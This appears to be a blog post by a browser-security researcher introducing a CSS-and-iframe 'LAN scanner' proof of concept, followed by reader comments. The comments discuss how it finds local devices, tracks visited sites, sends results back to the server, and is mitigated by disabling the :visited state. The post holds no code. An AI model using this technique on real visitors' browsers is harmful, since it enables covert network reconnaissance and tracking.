CSS LAN scanner

I think the single most insecure feature of internet browsers today is iframes, you can do too much with them and I feel I’ve only touched the surface with the examples I’ve shown. My next tool shows how simple it is to scan your entire local network from the internet using iframes, CSS and absolutely no javascript!

Update…

Geez I’ve never had so many 403 errors in my apache logs, you don’t need folder contents people! Look the code is in CSS, so you don’t need any other code, got it? Well stop trying to grab the contents of a directory that is in plain sight. Some people!

Whitepaper released

I don’t normally agree with releasing whitepapers on subjects because I believe you don’t need an essay to explain this stuff, all you need is to look at the code but I’d thought I would make the exception so here is a whitepaper about this subject:-

CSS Whitepaper

Run for the hills the internet is falling apart!

CSS LAN Scanner

Here’s some more CSS scanners that I’ve been told about:-
RSnake’s CSS scanner
PDP’s noscript scanner
Jeremiah Grossman’s CSS History hack

24 Responses to “CSS LAN scanner”

  1. Bipin 3~ Upadhyay writes:

    Scary (and refreshing) Stuff Gareth. :)

    Two questions though:
    1. My n/w lies neither in 10.x.x.x nor 192.x.x.x, yet the scanner is able to identify a number of devices. How’s that? :-/
    2. How are you identifying the device type?

  2. Gareth Heyes writes:

    1. I’ve tested it in Firefox so it might not work in other browsers. If you’ve visited 10.x.x.x or 192.x.x.x or changed addresses it will display them. This could also be used to display which addresses you have been to, a full CSS history hack without javascript similar to Jeremiah Grossman
    2. The device type is based on the default out of the box IP address which a device automatically gets assigned.

    Scary stuff indeed

  3. Gareth Heyes writes:

    Even more is possible with CSS and I’m going to update my CSS attacks page with new attacks soon.

  4. Nicolas Grekas writes:

    How could this be useful to Dr Evil ?
    I am able to scan MY network. Ok. So what ? How could this info be transmitted back ? Without JavaScript, I can’t think of any way. Am I wrong ?

  5. Gareth Heyes writes:

    Well a lot more is possible than you think. Stay tuned for my next example….CSS scripting!

  6. Gareth Heyes writes:

    OK no javascript just CSS! It will scan your IP and store it in a session as proof that it is possible. Tested only on Firefox, I told you the internet was falling apart πŸ˜‰

  7. Gareth Heyes writes:

    This also proves that any web site you visit can be tracked purely with CSS. I’d do a demo but I don’t think it is necessary really, I think I’ve already proven my point.

  8. David Stone writes:

    Might want to add HTTPS links to that CSS. For instance, my router is at 192.168.1.1, but I’ve turned off HTTP access to the dd-wrt control panel, so it doesn’t show up.

  9. Gareth Heyes writes:

    Good point David thanks! I’m planning to add router DNS name’s if I can find a list to successfully identify routers. Good thinking btw with your router.

  10. Thorin writes:

    Uh is there something up with the whitepaper? I tried that URL and it came back blank, reloaded a few times same thing. View page source comes back with just a few lines, nothing between the body tags.

  11. Gareth Heyes writes:

    Sorry Thorin just my sense of humor. I don’t believe in them.

  12. Ronald writes:

    haha a real whitepaper! I still wait for black paper.

    Oh no! Gareth what have you done!? I’m afraid surfing the interwebs… 4 real :)

  13. Gareth Heyes writes:

    hehe :) I don’t like being serious all the time

    Yep there’s not much you can do, who’s gonna turn off CSS lol.

  14. Ronald writes:

    hehe πŸ˜€

    We are getting there… Soon I have another post which probably will shock some. πŸ˜‰ not all, some. :)

  15. Gareth Heyes writes:

    Yep I know what you mean *some* will know what you can do with it and *some* will not πŸ˜‰

  16. Ronald writes:

    Let’s call the web deceased shall we?, or at least websecurity is a myth. πŸ˜‰

  17. Gareth Heyes writes:

    Yep in the last few years the browser manufacturers have been very lazy regarding new security policies.

    I’m just looking at the Firefox CSS features now and I can see huge scope for security problems, when I release the CSK (CSS Scripting Kit) you’ll see some of the issues.

    Web security is certainly a myth, time they got their act together!

  18. Unomi writes:

    This is only based on the browsers history. What if one cleans the history every minute?

    Is every browser vulnerable?

    BTW, this attack is not limited to HTTP requests. Any request to a URL supported by a browser can be logged. Say, FTP (ftp://), or port numbers (http://localhost:8080/) can be logged without notice.

    Awesome if you want to exploit it, a nightmare if you want to prevent it.

    – Unomi –

  19. Gareth Heyes writes:

    Cleaning your history will do no good for CSS LAN scanning because the script actually creates the history on page load, therefore the only protection is to disable visited in CSS.

    Yes any url that can be opened by iframes is available to be exploited.

  20. Gareth Heyes writes:

    I realise that this does leave Firefox and probably other browsers open to attack but I’m sick and tired of communicating with manufacturers who seem to think they know better than me and dismiss my reports.

    I’ve also had enough with the biased media coverage of security blogs to the point now were I don’t even care. It is laughable that this article will never get coverage so I’m leaving up to the manufacturers to monitor my web site because why should I go to all the effort for nothing?

  21. Unomi writes:

    One more comment/question….

    CSS allows to overrule previous set definitions. Isn’t it possible to overrule any ‘visited’ property with a default value? This way the url shouldn’t be requested.

    Or am I wrong?

    – Unomi –

  22. Gareth Heyes writes:

    Hi Unomi

    If you mean as a protection against LAN scanning then I don’t think it would be make any difference unfortunately because if you reset all visited states, the scanner then creates a new set of history so therefore overwriting the rule.

    The only way I could think to protect against this sort of attack would be to use something like stylish to disable the visited state altogether so the site in question cannot access the visited selector.

  23. Gareth Heyes writes:

    Some of you may have experienced some problems storing the IP address on Firefox. I have found the problem happens when the user agent hasn’t been set for the browser.

    This is because the security filters on my site, so the scanner will work in Firefox on all platforms.

  24. tiffany writes:

    i have something to ask:
    what if the 2 IP NOS IS SAME on the e mail , does it mean the same person using the same acc ?